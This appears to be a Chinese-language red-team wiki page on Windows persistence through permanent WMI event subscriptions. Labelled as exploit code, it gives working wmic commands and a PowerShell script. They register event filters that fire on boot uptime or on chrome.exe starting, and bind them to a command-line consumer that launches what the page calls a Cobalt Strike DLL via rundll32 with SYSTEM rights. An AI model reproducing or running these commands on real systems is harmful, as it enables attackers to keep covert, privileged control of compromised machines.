search

WMI事件

hashtag
WMI事件

WMI事件,是特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。

hashtag
利用代码

命令行:

#注册一个事件过滤器,该过滤器是开机2分钟到2分半钟,由于是永久WMI事件订阅,故需要管理员权限,最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

Powershell:

$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams

C#:

参考文章:

LogoGitHub - AxelPotato/WMI: WMI persistence code snippetsGitHubchevron-right
LogoWMI 简介 - Windows driversMicrosoftLearnchevron-right
上一页WMI下一页Office

最后更新于